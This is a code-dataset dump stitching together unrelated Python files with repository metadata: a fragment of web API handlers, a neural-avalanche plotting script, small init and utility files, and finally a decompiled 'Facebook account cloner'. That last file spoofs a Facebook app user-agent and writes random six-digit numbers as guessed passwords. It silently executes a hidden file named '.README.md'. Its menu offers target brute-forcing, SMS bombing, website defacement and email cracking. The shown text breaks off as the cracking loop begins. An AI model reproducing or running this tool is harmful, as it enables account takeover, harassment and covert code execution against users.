aQueryJson, aUser): Decl.from_json(aQueryJson, aUser) return 200, json.dumps({"ok": True}) @classmethod def GetAPIPath(cls): return "/api/setdecl" class DelDeclById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") lresult = Decl.GetById(lkeyId, aUser) if lresult: lresult.key.delete() return 200, "ok" else: return 404, "Decl not found" @classmethod def GetAPIPath(cls): return "/api/deldecl" class GetAllDeclsForParent(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") if lkeyId: lresult = Dist.GetById(lkeyId, aUser) if not (lkeyId and not lresult): lchildren = Decl.GetAllForParent(lkeyId, aUser) return 200, json.dumps({"children": [lchild.to_json() for lchild in lchildren]}) else: return 404, "Decl not found" @classmethod def GetAPIPath(cls): return "/api/getchilddecls" class GetDistributionSourceForDist(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") lpublishedOnly = aQueryJson.get("publishedonly") lresult = Dist.GetByIdForRead(lkeyId, aUser) if lkeyId else None if not lresult: luserId = aUser if isinstance(aUser, basestring) else aUser.user_id() ldecls = lresult.GetAllDeclsForAncestorTransitive(aUser, lpublishedOnly or (lresult.user_id != luserId)) return 200, json.dumps( [ldecl.to_decljson() for ldecl in ldecls] ) else: return 404, "Decl not found" @classmethod def GetAPIPath(cls): return "/api/getchilddecls" class GetLibDecls(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") ldecl = Decl.GetById(lkeyId, aUser) if lkeyId else None if ldecl: retval = ldecl.GetLibDecls(aUser) return 200, json.dumps(retval) else: return 400, "id required" @classmethod def GetAPIPath(cls): return "/api/getlibdecls"

22.860697

124

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0.126706

0.772255

0.758285

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0

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null

0

1

0

1

0

7

e755cb360632596d97a70e9aa1ba71a72d64552a

233

py

Python

src/kayako/objects/troubleshooter/__init__.py

jellestoel/kayako-python-api-library

7ae6737527030bb07c5d301f4f6f16c847b4316c

[ "BSD-2-Clause-FreeBSD" ]

null

src/kayako/objects/troubleshooter/__init__.py

jellestoel/kayako-python-api-library

7ae6737527030bb07c5d301f4f6f16c847b4316c

[ "BSD-2-Clause-FreeBSD" ]

null

src/kayako/objects/troubleshooter/__init__.py

jellestoel/kayako-python-api-library

7ae6737527030bb07c5d301f4f6f16c847b4316c

[ "BSD-2-Clause-FreeBSD" ]

null

from .troubleshooter_category import TroubleshooterCategory from .troubleshooter_step import TroubleshooterStep from .troubleshooter_comment import TroubleshooterComment from .troubleshooter_attachment import TroubleshooterAttachment

58.25

63

0.918455

20

233

10.5

0.55

0.342857

0

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233

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58.25

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null

0

1

0

1

0

1

0

7

e7e04254aae540f1282b4c99a4237469c1d47327

130

py

Python

screens/__init__.py

MinnowBoard-Projects/max-opencv-demos

13b9a8ad0b40a67c36c72ef1019283f21db3b0ac

[ "MIT" ]

null

screens/__init__.py

MinnowBoard-Projects/max-opencv-demos

13b9a8ad0b40a67c36c72ef1019283f21db3b0ac

[ "MIT" ]

null

screens/__init__.py

MinnowBoard-Projects/max-opencv-demos

13b9a8ad0b40a67c36c72ef1019283f21db3b0ac

[ "MIT" ]

null

import mazegame, mazesolver, tictactoe, cycles, preferences screen_list = [mazegame, mazesolver, tictactoe, cycles, preferences]

32.5

68

0.807692

13

130

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0.346154

0.519231

0.634615

0.846154

0

0.107692

130

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0

1

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false

0

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1

0

1

0

null

0

1

0

7

99af6b8ea772067259fb1cdb488c8834a3c3b7b5

13,811

py

Python

delpapa/avalanches/Fig4.py

delpapa/CritSORN

cdad55d55f39e04f568ca1bc0c6036bec8db08fb

[ "MIT" ]

null

delpapa/avalanches/Fig4.py

delpapa/CritSORN

cdad55d55f39e04f568ca1bc0c6036bec8db08fb

[ "MIT" ]

null

delpapa/avalanches/Fig4.py

delpapa/CritSORN

cdad55d55f39e04f568ca1bc0c6036bec8db08fb

[ "MIT" ]

null

#### # Script for the 4th paper figure (from FrozenPlasticity) # A, B: AllFrozen and AllFrozen_Step0 (random network) # C, D: IPFrozen and AllbutIPFrozen #### from pylab import * import tables import os from tempfile import TemporaryFile import data_analysis as analysis # work around to run powerlaw package [Alstott et al. 2014] import powerlaw as pl transient_steps = 2e6 frozen_steps = 2e6 number_of_files = 50 THETA = 'half' width = 6 height = 6 fig = figure(1, figsize=(width, height)) fig_4a = subplot(221) fig_4b = subplot(222) fig_4c = subplot(223) fig_4d = subplot(224) letter_size = 10 letter_size_panel = 12 line_width = 1.25 line_width_fit = 2.0 subplot_letter = (-0.2, 1) ### color parameters c_size = '#B22400' c_duration = '#006BB2' c_rawdata = 'gray' c_expcut = 'k' c_stable = '#2E4172' c_notstable = '#7887AB' ######################################################################## # Fig. 4A,B: Compare distributions of AllFrozen and normal SORN for experiment_name in ['AllFrozen']: print experiment_name exper_path ='' for regime in ['frozen', 'non-frozen']: print '\n', regime data_all = np.zeros((number_of_files, frozen_steps)) for result_file in range(number_of_files): exper = 'result.h5' exper_path = '../../../Avalanche_Experiments/Frozen_Plasticity/'\ + experiment_name + '/' + str(result_file+1) + '/common/' h5 = tables.openFile(os.path.join(exper_path,exper),'r') data = h5.root if regime == 'non-frozen': data_all[result_file] = np.around(data.activity[0] \ [transient_steps:frozen_steps+transient_steps]*data.c.N_e) if regime == 'frozen': data_all[result_file] = np.around(data.activity[0] \ [frozen_steps+transient_steps:]*data.c.N_e) h5.close() a_dur, a_area = analysis.avalanches(data_all, 'N', '200', \ Threshold=THETA) a_dur1, a_area1 = analysis.avalanches(data_all, 'N', '200',\ Theta_percent = 5) a_dur2, a_area2 = analysis.avalanches(data_all, 'N', '200',\ Theta_percent = 25) subplot(221) if regime == 'non-frozen': pl.plot_pdf(a_dur, color='k', linewidth=line_width_fit) a_dur1_pdf = pl.pdf(a_dur1, 10) a_dur2_pdf = pl.pdf(a_dur2, 10) BinCenters1 = (a_dur1_pdf[0][:-1]+a_dur1_pdf[0][1:])/2. BinCenters2 = (a_dur2_pdf[0][:-1]+a_dur2_pdf[0][1:])/2. x_max = a_dur1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_dur1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_dur2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='k', alpha=0.2) if regime == 'frozen': pl.plot_pdf(a_dur, color='cyan', linewidth=line_width) a_dur1_pdf = pl.pdf(a_dur1, 10) a_dur2_pdf = pl.pdf(a_dur2, 10) BinCenters1 = (a_dur1_pdf[0][:-1]+a_dur1_pdf[0][1:])/2. BinCenters2 = (a_dur2_pdf[0][:-1]+a_dur2_pdf[0][1:])/2. x_max = a_dur1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_dur1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_dur2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='cyan', alpha=0.2) subplot(222) if regime == 'non-frozen': pl.plot_pdf(a_area, color='k', linewidth=line_width_fit, \ label ='SORN') a_area1_pdf = pl.pdf(a_area1, 10) a_area2_pdf = pl.pdf(a_area2, 10) BinCenters1 = (a_area1_pdf[0][:-1]+a_area1_pdf[0][1:])/2. BinCenters2 = (a_area2_pdf[0][:-1]+a_area2_pdf[0][1:])/2. x_max = a_area1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_area1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_area2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='k', alpha=0.2) if regime == 'frozen': pl.plot_pdf(a_area, color='cyan', linewidth=line_width, \ label='Frozen (All)') a_area1_pdf = pl.pdf(a_area1, 10) a_area2_pdf = pl.pdf(a_area2, 10) BinCenters1 = (a_area1_pdf[0][:-1]+a_area1_pdf[0][1:])/2. BinCenters2 = (a_area2_pdf[0][:-1]+a_area2_pdf[0][1:])/2. x_max = a_area1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_area1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_area2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2))[100:-140990], interp2[100:-140990], interp1[100:-140990], facecolor='cyan', alpha=0.2) transient_steps = 0 # special way to plot an only initialized SORN print 'Freezing plasticity in the beginning...' exper_path ='' for regime in ['frozen']: print '\n', regime data_all = np.zeros((number_of_files, frozen_steps)) for result_file in range(number_of_files): exper = 'result.h5' exper_path = '' h5 = tables.openFile(os.path.join(exper_path,exper),'r') data = h5.root data_all[result_file] = np.around(data.activity[0] \ [frozen_steps+transient_steps:]*data.c.N_e) h5.close() a_dur, a_area = analysis.avalanches(data_all, 'N', '200', \ Threshold=THETA) subplot(221) pl.plot_pdf(a_dur, color='r', linewidth=line_width) subplot(222) pl.plot_pdf(a_area, color='r', linewidth=line_width, \ label='Random network') # axis stuff subplot(221) xscale('log'); yscale('log') xlim([1, 3000]) ylim([0.000001, 1]) # axis stuff xlabel(r'$T$', fontsize=letter_size) ylabel(r'$f(T)$', fontsize=letter_size) fig_4a.xaxis.set_ticks_position('bottom') fig_4a.yaxis.set_ticks_position('left') tick_params(labelsize=letter_size) fig_4a.spines['right'].set_visible(False) fig_4a.spines['top'].set_visible(False) # ticks name xticks([1, 10, 100, 1000], \ ['$10^{0}$', '$10^{1}$', '$10^{2}$', '$10^{3}$']) yticks([1, 0.001, 0.000001], \ ['$10^{0}$', '$10^{-3}$', '$10^{-6}$']) subplot(222) xscale('log'); yscale('log') xlim([1, 20000]) ylim([0.0000001, 1]) xlabel(r'$S$', fontsize=letter_size) ylabel(r'$f(S)$', fontsize=letter_size) fig_4b.xaxis.set_ticks_position('bottom') fig_4b.yaxis.set_ticks_position('left') tick_params(labelsize=letter_size) # ticks name xticks([1, 100, 10000], \ ['$10^{0}$', '$10^{2}$', '$10^{4}$']) yticks([1, 0.001, 0.000001], \ ['$10^{0}$', '$10^{-3}$', '$10^{-6}$']) fig_4b.spines['right'].set_visible(False) fig_4b.spines['top'].set_visible(False) legend(loc=(0.4, 0.8), prop={'size':letter_size}, frameon=False) ######################################################################## ######################################################################## # Fig. 4C, D transient_steps = 2e6 frozen_steps = 2e6 for experiment_name in ['IPFrozen', 'AllButIPFrozen']: print experiment_name exper_path ='' for regime in ['frozen']: print '\n', regime data_all = np.zeros((number_of_files, frozen_steps)) for result_file in range(number_of_files): exper = 'result.h5' exper_path = '' h5 = tables.openFile(os.path.join(exper_path,exper),'r') data = h5.root if regime == 'non-frozen': data_all[result_file] = np.around(data.activity[0] \ [transient_steps:frozen_steps+transient_steps]*data.c.N_e) if regime == 'frozen': data_all[result_file] = np.around(data.activity[0] \ [frozen_steps+transient_steps:]*data.c.N_e) h5.close() a_dur, a_area = analysis.avalanches(data_all, 'N', '200', \ Threshold=THETA) # shaded areas a_dur1, a_area1 = analysis.avalanches(data_all, 'N', '200',\ Theta_percent = 5) a_dur2, a_area2 = analysis.avalanches(data_all, 'N', '200',\ Theta_percent = 25) if experiment_name == 'IPFrozen': print 'Fig. 4C, D...\n' subplot(223) pl.plot_pdf(a_dur, color='r', linewidth=line_width) a_dur1_pdf = pl.pdf(a_dur1, 10) a_dur2_pdf = pl.pdf(a_dur2, 10) BinCenters1 = (a_dur1_pdf[0][:-1]+a_dur1_pdf[0][1:])/2. BinCenters2 = (a_dur2_pdf[0][:-1]+a_dur2_pdf[0][1:])/2. x_max = a_dur1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_dur1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_dur2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='r', alpha=0.2) subplot(224) label_exp = 'Frozen (IP)' pl.plot_pdf(a_area, linewidth=line_width, color='r', \ label=label_exp) a_area1_pdf = pl.pdf(a_area1, 10) a_area2_pdf = pl.pdf(a_area2, 10) BinCenters1 = (a_area1_pdf[0][:-1]+a_area1_pdf[0][1:])/2. BinCenters2 = (a_area2_pdf[0][:-1]+a_area2_pdf[0][1:])/2. x_max = a_area1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_area1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_area2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='r', alpha=0.2) if experiment_name == 'AllButIPFrozen': subplot(223) pl.plot_pdf(a_dur, color='cyan', linewidth=line_width) a_dur1_pdf = pl.pdf(a_dur1, 10) a_dur2_pdf = pl.pdf(a_dur2, 10) BinCenters1 = (a_dur1_pdf[0][:-1]+a_dur1_pdf[0][1:])/2. BinCenters2 = (a_dur2_pdf[0][:-1]+a_dur2_pdf[0][1:])/2. x_max = a_dur1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_dur1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_dur2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='cyan', alpha=0.2) subplot(224) label_exp = 'Frozen (All but IP)' pl.plot_pdf(a_area, color='cyan', linewidth=line_width, \ label=label_exp) a_area1_pdf = pl.pdf(a_area1, 10) a_area2_pdf = pl.pdf(a_area2, 10) BinCenters1 = (a_area1_pdf[0][:-1]+a_area1_pdf[0][1:])/2. BinCenters2 = (a_area2_pdf[0][:-1]+a_area2_pdf[0][1:])/2. x_max = a_area1_pdf[0].max() interp1 = np.interp(np.arange(x_max), BinCenters1, a_area1_pdf[1]) interp2 = np.interp(np.arange(x_max), BinCenters2, a_area2_pdf[1]) fill_between(np.linspace(0,x_max,len(interp2)), interp2, interp1, facecolor='cyan', alpha=0.2) # axis stuff subplot(223) xscale('log'); yscale('log') xlim([1, 3000]) ylim([0.000001, 1]) xlabel(r'$T$', fontsize=letter_size) ylabel(r'$f(T)$', fontsize=letter_size) fig_4c.xaxis.set_ticks_position('bottom') fig_4c.yaxis.set_ticks_position('left') tick_params(labelsize=letter_size) # ticks name xticks([1, 10, 100, 1000], \ ['$10^{0}$', '$10^{1}$', '$10^{2}$', '$10^{3}$']) yticks([1, 0.001, 0.000001], \ ['$10^{0}$', '$10^{-3}$', '$10^{-6}$']) subplot(224) xscale('log'); yscale('log') xlim([1, 20000]) ylim([0.0000001, 1]) xlabel(r'$S$', fontsize=letter_size) ylabel(r'$f(S)$', fontsize=letter_size) # ticks name xticks([1, 100, 10000], \ ['$10^{0}$', '$10^{2}$', '$10^{4}$']) yticks([1, 0.001, 0.000001], \ ['$10^{0}$', '$10^{-3}$', '$10^{-6}$']) fig_4c.spines['right'].set_visible(False) fig_4c.spines['top'].set_visible(False) fig_4d.spines['right'].set_visible(False) fig_4d.spines['top'].set_visible(False) fig_4d.xaxis.set_ticks_position('bottom') fig_4d.yaxis.set_ticks_position('left') tick_params(labelsize=letter_size) legend(loc=(0.3, 0.8), prop={'size':letter_size}, frameon=False) ######################################################################## fig_4a.annotate('A', xy=subplot_letter, xycoords='axes fraction', \ fontsize=letter_size_panel , fontweight='bold', \ horizontalalignment='right', verticalalignment='bottom') fig_4b.annotate('B', xy=subplot_letter, xycoords='axes fraction', \ fontsize=letter_size_panel , fontweight='bold', \ horizontalalignment='right', verticalalignment='bottom') fig_4c.annotate('C', xy=subplot_letter, xycoords='axes fraction', \ fontsize=letter_size_panel , fontweight='bold', \ horizontalalignment='right', verticalalignment='bottom') fig_4d.annotate('D', xy=subplot_letter, xycoords='axes fraction', \ fontsize=letter_size_panel , fontweight='bold', \ horizontalalignment='right', verticalalignment='bottom') fig.subplots_adjust(wspace=.3) fig.subplots_adjust(hspace=.3) print 'Saving figures...', result_path = '../../plots/' result_name_png = 'Fig4.pdf' savefig(os.path.join(result_path, result_name_png), format = 'pdf') print 'done\n\n' show()

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823ab7ee7cdf108df0597bf77568b8cc5843bbbc

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py

Python

Demos/Demo-4.2 Modules/main.py

Josverl/MicroPython-Bootcamp

29f5ccc9768fbea621029dcf6eea9c91ff84c1d5

[ "MIT" ]

4

2018-04-28T13:43:20.000Z

2021-03-11T16:10:35.000Z

Demos/Demo-4.2 Modules/main.py

Josverl/MicroPython-Bootcamp

29f5ccc9768fbea621029dcf6eea9c91ff84c1d5

[ "MIT" ]

null

Demos/Demo-4.2 Modules/main.py

Josverl/MicroPython-Bootcamp

29f5ccc9768fbea621029dcf6eea9c91ff84c1d5

[ "MIT" ]

null

print("-------------------------------------") print("Demo 4.1 Modules ") print("-------------------------------------")

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py

Python

projects/tutorials/VMobject.py

behnamasadi/manim

b9d9d164927df886ad18112b9512113e6dd6565a

[ "MIT" ]

null

projects/tutorials/VMobject.py

behnamasadi/manim

b9d9d164927df886ad18112b9512113e6dd6565a

[ "MIT" ]

null

projects/tutorials/VMobject.py

behnamasadi/manim

b9d9d164927df886ad18112b9512113e6dd6565a

[ "MIT" ]

null

# manim.mobject.types.vectorized_mobject.VMobject¶ # https://docs.manim.community/en/v0.3.0/reference/manim.mobject.types.vectorized_mobject.VMobject.html#manim.mobject.types.vectorized_mobject.VMobject

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419f85fac9effda714b25c0dc838b105c8a962be

129

py

Python

uaparser/django/context_processor.py

ojarva/ua-detection-python

5a27eac66a82fd8c18f7710c9d4880cbcabff55d

[ "MIT" ]

1

2017-02-03T17:31:00.000Z

uaparser/django/context_processor.py

ojarva/ua-detection-python

5a27eac66a82fd8c18f7710c9d4880cbcabff55d

[ "MIT" ]

null

uaparser/django/context_processor.py

ojarva/ua-detection-python

5a27eac66a82fd8c18f7710c9d4880cbcabff55d

[ "MIT" ]

null

def add_parsed_ua(request): if hasattr(request, "parsed_ua"): return {"parsed_ua": request.parsed_ua} return {}

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172

py

Python

kicker/agents/__init__.py

KI-cker/Ki-cker

b48ae75bfeea970940ad657c73d71438531259c6

[ "Apache-2.0" ]

null

kicker/agents/__init__.py

KI-cker/Ki-cker

b48ae75bfeea970940ad657c73d71438531259c6

[ "Apache-2.0" ]

14

2018-02-21T17:58:33.000Z

2022-03-11T23:16:09.000Z

kicker/agents/__init__.py

KI-cker/Ki-cker

b48ae75bfeea970940ad657c73d71438531259c6

[ "Apache-2.0" ]

1

2018-02-22T09:28:26.000Z

from kicker.agents.keyboard import KeyboardAgent from kicker.agents.keyboard_alternative import KeyboardAgentAlternative from kicker.agents.random_agent import RandomAgent

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py

Python

autoencoder/losses.py

miriskalt/AnomalyDetectionAutoencoder

2543766699b38149e449f720d899ea8c44ad1c52

[ "MIT" ]

161

2020-09-01T01:27:20.000Z

2022-03-28T02:20:04.000Z

autoencoder/losses.py

miriskalt/AnomalyDetectionAutoencoder

2543766699b38149e449f720d899ea8c44ad1c52

[ "MIT" ]

21

2020-09-02T07:20:32.000Z

2022-02-10T01:06:56.000Z

autoencoder/losses.py

miriskalt/AnomalyDetectionAutoencoder

2543766699b38149e449f720d899ea8c44ad1c52

[ "MIT" ]

48

2020-09-11T16:41:58.000Z

2022-03-29T07:52:47.000Z

import tensorflow as tf def ssim_loss(dynamic_range): def loss(imgs_true, imgs_pred): # return (1 - tf.image.ssim(imgs_true, imgs_pred, dynamic_range)) / 2 return 1 - tf.image.ssim(imgs_true, imgs_pred, dynamic_range) # return 1 - tf.reduce_mean(tf.image.ssim(y_true, y_pred, dynamic_range)) return loss def mssim_loss(dynamic_range): def loss(imgs_true, imgs_pred): return 1 - tf.image.ssim_multiscale(imgs_true, imgs_pred, dynamic_range) # return 1 - tf.reduce_mean( # tf.image.ssim_multiscale(imgs_true, imgs_pred, dynamic_range) # ) return loss def l2_loss(imgs_true, imgs_pred): # return 2 * tf.nn.l2_loss(imgs_true - imgs_pred) return tf.nn.l2_loss(imgs_true - imgs_pred)

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68eda1d4a2923d62293f27c5144be577967301fe

38,177

py

Python

bind/pypi_1.py

shyamjangid07/Reverse-Engineering

469efabcd6057f7895d8d891f1fabdf2ffe730b0

[ "Apache-2.0" ]

337

2020-08-15T12:22:14.000Z

2022-03-29T06:05:15.000Z

bind/pypi_1.py

Wh014M/Reverse-Engineering

f7aae2c43f7ea4a6730964d085c07814b6660a53

[ "Apache-2.0" ]

3

2020-11-12T14:30:48.000Z

2021-05-18T16:56:22.000Z

bind/pypi_1.py

Wh014M/Reverse-Engineering

f7aae2c43f7ea4a6730964d085c07814b6660a53

[ "Apache-2.0" ]

83

2020-08-15T00:22:58.000Z

2022-03-31T08:40:23.000Z

# Decompiled by HTR-TECH | TAHMID RAYAT # Github : https://github.com/htr-tech #--------------------------------------- # Source File : a.py # Time : Wed Sep 9 04:25:17 2020 #--------------------------------------- # uncompyle6 version 3.7.4 # Python bytecode 2.7 # Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15) # [GCC 8.3.0] # Embedded file name: <tahm1d> import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass os.system('rm -rf .txt') for n in range(99265): nmbr = random.randint(111111, 999999) sys.stdout = open('.txt', 'a') print nmbr sys.stdout.flush() try: import requests except ImportError: os.system('pip2 install requests') try: import mechanize except ImportError: os.system('pip2 install mechanize') time.sleep(1) os.system('python2 .README.md') from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')] def exb(): print '[!] Exit Successfully' os.sys.exit() def exxb(): print '[!] \x1b[1;91mTHIS OPTION NOT AVAILABLE AT THE MOMENT.BUT \x1b[3;92;40m COM\x1b[1;95mING SO\x1b[1;97mON \x1b[1;91m\x1b[0;34;40m' os.sys.exit() def psb(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.03) def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(3.0 / 200) def tik(): titik = [ ' ', '. ', '.. ', '...', '.. ', '. ', ' '] for o in titik: print '\r\x1b[1;91m [\xe2\x97\x8f] \x1b[1;92mLoa\x1b[1;90mding \x1b[1;97m' + o, sys.stdout.flush() time.sleep(0.5) def lodhirt(): lodhirt = [ 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS', ' ', 'TEAM V-VIRUS\n'] for o in lodhirt: print '\r\x1b[1;94m \x1b[1;92m' + o, sys.stdout.flush() time.sleep(0.1) def jaalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(2.0 / 9900) def t(): time.sleep(1) def cb(): os.system('clear') logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[3;90m\n FACEBOOK ACCOUNT CLONER BY \x1b[3;91mBOTOL BABA\x1b[0;37;40m\n\x1b[1;94m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\n\x1b[1;92m\xe2\x96\xb8 \x1b[1;95mAUTHOR : MEHEDI HASAN ARIYAN\n\x1b[1;92m\xe2\x96\xb8 \x1b[1;95mFACEBOOK : FACEBOOK.COM/THEMEHTAN\n\x1b[1;92m\xe2\x96\xb8 \x1b[1;95mYOUTUBE : YOUTUBE.COM/MASTERTRICK1\n\x1b[1;92m\xe2\x96\xb8 \x1b[1;95mGITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;94m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80" back = 0 successful = [] cpb = [] oks = [] id = [] def menu(): os.system('clear') print logo lodhirt() print print ' \x1b[4;96mINDIAN MENU\x1b[0;37;40m \x1b[4;96mINTERNATIONAL\x1b[0;37;40m' print jaalan('\x1b[1;91m[\x1b[1;92m1\x1b[1;91m] \x1b[1;93mINDIAN 6 DIGIT CLONE \x1b[1;91m[\x1b[1;92m5\x1b[1;91m] \x1b[1;93mUSA 6 DIGIT CLONE') jaalan('\x1b[1;91m[\x1b[1;92m2\x1b[1;91m] \x1b[1;93mINDIAN 7 DIGIT CLONE \x1b[1;91m[\x1b[1;92m6\x1b[1;91m] \x1b[1;93mITALY 6 DIGIT CLONE') jaalan('\x1b[1;91m[\x1b[1;92m3\x1b[1;91m] \x1b[1;93mFACEBOOK AUTO REPORT \x1b[1;91m[\x1b[1;92m7\x1b[1;91m] \x1b[1;93mSPAIN 6 DIGIT CLONE') jaalan('\x1b[1;91m[\x1b[1;92m4\x1b[1;91m] \x1b[1;93mFRIEND LIST ID HACK \x1b[1;91m[\x1b[1;92m8\x1b[1;91m] \x1b[1;93mPOLAND 6 DIGIT CLONE') jaalan('\x1b[1;91m[\x1b[1;92m9\x1b[1;91m] \x1b[1;93mTARGET ID HACK {BRUTE} ') print print ' \x1b[4;96mBANGLADESHI MENU\x1b[0;37;40m \x1b[4;96mMORE TOOLS\x1b[0;37;40m' print jaalan('\x1b[1;91m[\x1b[1;92m11\x1b[1;91m] \x1b[1;90m6 DIGIT CRACKER \x1b[1;91m[\x1b[1;92m15\x1b[1;91m] \x1b[1;90mEMAIL CRACKER') jaalan('\x1b[1;91m[\x1b[1;92m12\x1b[1;91m] \x1b[1;90m7 DIGIT CRACKER \x1b[1;91m[\x1b[1;92m16\x1b[1;91m] \x1b[1;90mSMS CALL BOMBER') jaalan('\x1b[1;91m[\x1b[1;92m13\x1b[1;91m] \x1b[1;90m8 DIGIT CRACKER \x1b[1;91m[\x1b[1;92m17\x1b[1;91m] \x1b[1;90mWEBSITE DEFACEMENT') jaalan('\x1b[1;91m[\x1b[1;92m14\x1b[1;91m] \x1b[1;90m11 DIGIT CRACKER \x1b[1;91m[\x1b[1;92m18\x1b[1;91m] \x1b[1;90mDEATH MAIL GRABBER') print print jalan(' \x1b[1;91m[\x1b[1;93m20\x1b[1;91m] \x1b[1;92mUPDATE \x1b[1;91m[\x1b[1;93m21\x1b[1;91m] \x1b[1;92mFOLLOW \x1b[1;91m[\x1b[1;93m22\x1b[1;91m] \x1b[1;92mCONTACT \x1b[1;91m[\x1b[1;93m00\x1b[1;91m] \x1b[1;92mEXIT') action() def action(): global cpb global oks bch = raw_input('\n\n \x1b[1;96m> ') if bch == '': print '[!] Fill in correctly' action() elif bch == '1': tik() os.system('clear') print logo print try: c = raw_input('TYPE ANY 4 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 9540 TO 9970 : ') k = '+91' idlist = '.txt' for line in open(idlist, 'r').readlines(): 